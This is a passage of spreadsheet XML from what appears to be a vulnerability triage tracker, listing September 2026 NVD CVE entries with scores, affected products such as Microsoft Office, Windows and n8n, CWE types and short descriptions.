r="246"><c r="A246" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B246" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C246" s="5" t="inlineStr"><is><t>CVE-2026-80081</t></is></c><c r="D246" s="5" t="n"><v>8.800000000000001</v></c><c r="E246" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F246" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G246" s="5" t="inlineStr" /><c r="H246" s="5" t="n"><v>0.005</v></c><c r="I246" s="5" t="inlineStr" /><c r="J246" s="5" t="inlineStr" /><c r="K246" s="5" t="inlineStr"><is><t>microsoft:365_apps</t></is></c><c r="L246" s="5" t="inlineStr" /><c r="M246" s="5" t="inlineStr" /><c r="N246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P246" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q246" s="5" t="inlineStr" /><c r="R246" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S246" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t></is></c></row><row r="247"><c r="A247" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B247" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C247" s="5" t="inlineStr"><is><t>CVE-2026-80083</t></is></c><c r="D247" s="5" t="n"><v>8.800000000000001</v></c><c r="E247" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F247" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G247" s="5" t="inlineStr" /><c r="H247" s="5" t="n"><v>0.002</v></c><c r="I247" s="5" t="inlineStr" /><c r="J247" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K247" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L247" s="5" t="inlineStr" /><c r="M247" s="5" t="inlineStr" /><c r="N247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P247" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q247" s="5" t="inlineStr" /><c r="R247" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S247" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="T247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t></is></c></row><row r="248"><c r="A248" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C248" s="5" t="inlineStr"><is><t>CVE-2026-80085</t></is></c><c r="D248" s="5" t="n"><v>8.800000000000001</v></c><c r="E248" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F248" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G248" s="5" t="inlineStr" /><c r="H248" s="5" t="n"><v>0.005</v></c><c r="I248" s="5" t="inlineStr" /><c r="J248" s="5" t="inlineStr" /><c r="K248" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L248" s="5" t="inlineStr" /><c r="M248" s="5" t="inlineStr" /><c r="N248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P248" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q248" s="5" t="inlineStr" /><c r="R248" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S248" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t></is></c></row><row r="249"><c r="A249" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C249" s="5" t="inlineStr"><is><t>CVE-2026-80096</t></is></c><c r="D249" s="5" t="n"><v>8.800000000000001</v></c><c r="E249" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F249" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G249" s="5" t="inlineStr" /><c r="H249" s="5" t="n"><v>0.007</v></c><c r="I249" s="5" t="inlineStr" /><c r="J249" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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49" s="5" t="inlineStr" /><c r="M249" s="5" t="inlineStr" /><c r="N249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P249" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q249" s="5" t="inlineStr" /><c r="R249" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S249" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t></is></c></row><row r="250"><c r="A250" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C250" s="5" t="inlineStr"><is><t>CVE-2026-81352</t></is></c><c r="D250" s="5" t="n"><v>8.800000000000001</v></c><c r="E250" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G250" s="5" t="inlineStr" /><c r="H250" s="5" t="n"><v>0.005</v></c><c r="I250" s="5" t="inlineStr" /><c r="J250" s="5" t="inlineStr" /><c r="K250" s="5" t="inlineStr" /><c r="L250" s="5" t="inlineStr" /><c r="M250" s="5" t="inlineStr" /><c r="N250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P250" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q250" s="5" t="inlineStr" /><c r="R250" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S250" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t></is></c></row><row r="251"><c r="A251" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C251" s="5" t="inlineStr"><is><t>CVE-2026-81385</t></is></c><c r="D251" s="5" t="n"><v>8.800000000000001</v></c><c r="E251" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G251" s="5" t="inlineStr" /><c r="H251" s="5" t="n"><v>0.01</v></c><c r="I251" s="5" t="inlineStr" /><c r="J251" s="5" t="inlineStr" /><c r="K251" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L251" s="5" t="inlineStr" /><c r="M251" s="5" t="inlineStr" /><c r="N251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P251" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q251" s="5" t="inlineStr" /><c r="R251" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S251" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t></is></c></row><row r="252"><c r="A252" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C252" s="5" t="inlineStr"><is><t>CVE-2026-81952</t></is></c><c r="D252" s="5" t="n"><v>8.800000000000001</v></c><c r="E252" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G252" s="5" t="inlineStr" /><c r="H252" s="5" t="n"><v>0.006</v></c><c r="I252" s="5" t="inlineStr" /><c r="J252" s="5" t="inlineStr" /><c r="K252" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L252" s="5" t="inlineStr" /><c r="M252" s="5" t="inlineStr" /><c r="N252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P252" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q252" s="5" t="inlineStr" /><c r="R252" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S252" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t></is></c></row><row r="253"><c r="A253" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C253" s="5" t="inlineStr"><is><t>CVE-2026-81955</t></is></c><c r="D253" s="5" t="n"><v>8.800000000000001</v></c><c r="E253" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G253" s="5" t="inlineStr" /><c r="H253" s="5" t="n"><v>0.006</v></c><c r="I253" s="5" t="inlineStr" /><c r="J253" s="5" t="inlineStr" /><c r="K253" s="5" t="inlineStr" /><c r="L253" s="5" t="inlineStr" /><c r="M253" s="5" t="inlineStr" /><c r="N253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P253" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q253" s="5" t="inlineStr" /><c r="R253" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S253" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t></is></c></row><row r="254"><c r="A254" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C254" s="5" t="inlineStr"><is><t>CVE-2026-81996</t></is></c><c r="D254" s="5" t="n"><v>8.800000000000001</v></c><c r="E254" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F254" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G254" s="5" t="inlineStr" /><c r="H254" s="5" t="n"><v>0.001</v></c><c r="I254" s="5" t="inlineStr" /><c r="J254" s="5" t="inlineStr" /><c r="K254" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L254" s="5" t="inlineStr" /><c r="M254" s="5" t="inlineStr" /><c r="N254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P254" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q254" s="5" t="inlineStr" /><c r="R254" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S254" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t></is></c></row><row r="255"><c r="A255" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C255" s="5" t="inlineStr"><is><t>CVE-2026-82536</t></is></c><c r="D255" s="5" t="n"><v>8.800000000000001</v></c><c r="E255" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G255" s="5" t="inlineStr" /><c r="H255" s="5" t="n"><v>0.003</v></c><c r="I255" s="5" t="inlineStr" /><c r="J255" s="5" t="inlineStr" /><c r="K255" s="5" t="inlineStr" /><c r="L255" s="5" t="inlineStr" /><c r="M255" s="5" t="inlineStr" /><c r="N255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q255" s="5" t="inlineStr" /><c r="R255" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S255" s="5" t="inlineStr"><is><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is></c><c r="T255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t></is></c></row><row r="256"><c r="A256" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C256" s="5" t="inlineStr"><is><t>CVE-2026-83941</t></is></c><c r="D256" s="5" t="n"><v>8.800000000000001</v></c><c r="E256" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G256" s="5" t="inlineStr" /><c r="H256" s="5" t="n"><v>0.007</v></c><c r="I256" s="5" t="inlineStr" /><c r="J256" s="5" t="inlineStr" /><c r="K256" s="5" t="inlineStr"><is><t>microsoft:entra_id</t></is></c><c r="L256" s="5" t="inlineStr" /><c r="M256" s="5" t="inlineStr" /><c r="N256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P256" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q256" s="5" t="inlineStr" /><c r="R256" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S256" s="5" t="inlineStr"><is><t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t></is></c></row><row r="257"><c r="A257" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C257" s="5" t="inlineStr"><is><t>CVE-2026-83992</t></is></c><c r="D257" s="5" t="n"><v>8.800000000000001</v></c><c r="E257" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F257" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G257" s="5" t="inlineStr" /><c r="H257" s="5" t="n"><v>0.006</v></c><c r="I257" s="5" t="inlineStr" /><c r="J257" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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7" s="5" t="inlineStr" /><c r="M257" s="5" t="inlineStr" /><c r="N257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P257" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q257" s="5" t="inlineStr" /><c r="R257" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S257" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t></is></c></row><row r="258"><c r="A258" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C258" s="5" t="inlineStr"><is><t>CVE-2026-83996</t></is></c><c r="D258" s="5" t="n"><v>8.800000000000001</v></c><c r="E258" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F258" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G258" s="5" t="inlineStr" /><c r="H258" s="5" t="n"><v>0.002</v></c><c r="I258" s="5" t="inlineStr" /><c r="J258" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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8" s="5" t="inlineStr" /><c r="M258" s="5" t="inlineStr" /><c r="N258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P258" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q258" s="5" t="inlineStr" /><c r="R258" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S258" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t></is></c></row><row r="259"><c r="A259" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C259" s="5" t="inlineStr"><is><t>CVE-2026-83998</t></is></c><c r="D259" s="5" t="n"><v>8.800000000000001</v></c><c r="E259" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G259" s="5" t="inlineStr" /><c r="H259" s="5" t="n"><v>0.004</v></c><c r="I259" s="5" t="inlineStr" /><c r="J259" s="5" t="inlineStr" /><c r="K259" s="5" t="inlineStr" /><c r="L259" s="5" t="inlineStr" /><c r="M259" s="5" t="inlineStr" /><c r="N259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P259" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q259" s="5" t="inlineStr" /><c r="R259" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S259" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t></is></c></row><row r="260"><c r="A260" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C260" s="5" t="inlineStr"><is><t>CVE-2026-85877</t></is></c><c r="D260" s="5" t="n"><v>8.800000000000001</v></c><c r="E260" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G260" s="5" t="inlineStr" /><c r="H260" s="5" t="n"><v>0.004</v></c><c r="I260" s="5" t="inlineStr" /><c r="J260" s="5" t="inlineStr" /><c r="K260" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2</t></is></c><c r="L260" s="5" t="inlineStr" /><c r="M260" s="5" t="inlineStr" /><c r="N260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P260" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q260" s="5" t="inlineStr" /><c r="R260" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S260" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t></is></c></row><row r="261"><c r="A261" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C261" s="5" t="inlineStr"><is><t>CVE-2026-86076</t></is></c><c r="D261" s="5" t="n"><v>8.800000000000001</v></c><c r="E261" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G261" s="5" t="inlineStr" /><c r="H261" s="5" t="n"><v>0.004</v></c><c r="I261" s="5" t="inlineStr" /><c r="J261" s="5" t="inlineStr" /><c r="K261" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L261" s="5" t="inlineStr" /><c r="M261" s="5" t="inlineStr" /><c r="N261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P261" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q261" s="5" t="inlineStr" /><c r="R261" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S261" s="5" t="inlineStr"><is><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is></c><c r="T261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t></is></c></row><row r="262"><c r="A262" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C262" s="5" t="inlineStr"><is><t>CVE-2026-86083</t></is></c><c r="D262" s="5" t="n"><v>8.800000000000001</v></c><c r="E262" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G262" s="5" t="inlineStr" /><c r="H262" s="5" t="n"><v>0.004</v></c><c r="I262" s="5" t="inlineStr" /><c r="J262" s="5" t="inlineStr" /><c r="K262" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L262" s="5" t="inlineStr" /><c r="M262" s="5" t="inlineStr" /><c r="N262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P262" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q262" s="5" t="inlineStr" /><c r="R262" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S262" s="5" t="inlineStr"><is><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is></c><c r="T262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t></is></c></row><row r="263"><c r="A263" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C263" s="5" t="inlineStr"><is><t>CVE-2026-86730</t></is></c><c r="D263" s="5" t="n"><v>8.800000000000001</v></c><c r="E263" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G263" s="5" t="inlineStr" /><c r="H263" s="5" t="n"><v>0.004</v></c><c r="I263" s="5" t="inlineStr" /><c r="J263" s="5" t="inlineStr" /><c r="K263" s="5" t="inlineStr" /><c r="L263" s="5" t="inlineStr" /><c r="M263" s="5" t="inlineStr" /><c r="N263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q263" s="5" t="inlineStr" /><c r="R263" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S263" s="5" t="inlineStr"><is><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is></c><c r="T263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t></is></c></row><row r="264"><c r="A264" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C264" s="5" t="inlineStr"><is><t>CVE-2026-12611</t></is></c><c r="D264" s="5" t="n"><v>8.699999999999999</v></c><c r="E264" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F264" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G264" s="5" t="inlineStr" /><c r="H264" s="5" t="n"><v>0.003</v></c><c r="I264" s="5" t="inlineStr" /><c r="J264" s="5" t="inlineStr" /><c r="K264" s="5" t="inlineStr" /><c r="L264" s="5" t="inlineStr" /><c r="M264" s="5" t="inlineStr" /><c r="N264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P264" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q264" s="5" t="inlineStr" /><c r="R264" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S264" s="5" t="inlineStr"><is><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is></c><c r="T264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t></is></c></row><row r="265"><c r="A265" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C265" s="5" t="inlineStr"><is><t>CVE-2026-33197</t></is></c><c r="D265" s="5" t="n"><v>8.699999999999999</v></c><c r="E265" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F265" s="5" t="inlineStr"><is><t>biossecurity@ami.com</t></is></c><c r="G265" s="5" t="inlineStr" /><c r="H265" s="5" t="n"><v>0.001</v></c><c r="I265" s="5" t="inlineStr" /><c r="J265" s="5" t="inlineStr" /><c r="K265" s="5" t="inlineStr" /><c r="L265" s="5" t="inlineStr" /><c r="M265" s="5" t="inlineStr" /><c r="N265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q265" s="5" t="inlineStr" /><c r="R265" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S265" s="5" t="inlineStr"><is><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is></c><c r="T265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t></is></c></row><row r="266"><c r="A266" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C266" s="5" t="inlineStr"><is><t>CVE-2026-55250</t></is></c><c r="D266" s="5" t="n"><v>8.699999999999999</v></c><c r="E266" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F266" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G266" s="5" t="inlineStr" /><c r="H266" s="5" t="n"><v>0.006</v></c><c r="I266" s="5" t="inlineStr" /><c r="J266" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K266" s="5" t="inlineStr" /><c r="L266" s="5" t="inlineStr" /><c r="M266" s="5" t="inlineStr" /><c r="N266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P266" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q266" s="5" t="inlineStr" /><c r="R266" s="5" t="inlineStr"><is><t>CWE-294, CWE-613, CWE-672</t></is></c><c r="S266" s="5" t="inlineStr"><is><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is></c><c r="T266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t></is></c></row><row r="267"><c r="A267" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C267" s="5" t="inlineStr"><is><t>CVE-2026-62648</t></is></c><c r="D267" s="5" t="n"><v>8.699999999999999</v></c><c r="E267" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F267" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G267" s="5" t="inlineStr" /><c r="H267" s="5" t="n"><v>0.003</v></c><c r="I267" s="5" t="inlineStr" /><c r="J267" s="5" t="inlineStr" /><c r="K267" s="5" t="inlineStr" /><c r="L267" s="5" t="inlineStr" /><c r="M267" s="5" t="inlineStr" /><c r="N267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q267" s="5" t="inlineStr" /><c r="R267" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S267" s="5" t="inlineStr"><is><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is></c><c r="T267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t></is></c></row><row r="268"><c r="A268" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C268" s="5" t="inlineStr"><is><t>CVE-2026-62649</t></is></c><c r="D268" s="5" t="n"><v>8.699999999999999</v></c><c r="E268" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F268" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G268" s="5" t="inlineStr" /><c r="H268" s="5" t="n"><v>0.003</v></c><c r="I268" s="5" t="inlineStr" /><c r="J268" s="5" t="inlineStr" /><c r="K268" s="5" t="inlineStr" /><c r="L268" s="5" t="inlineStr" /><c r="M268" s="5" t="inlineStr" /><c r="N268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P268" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q268" s="5" t="inlineStr" /><c r="R268" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c 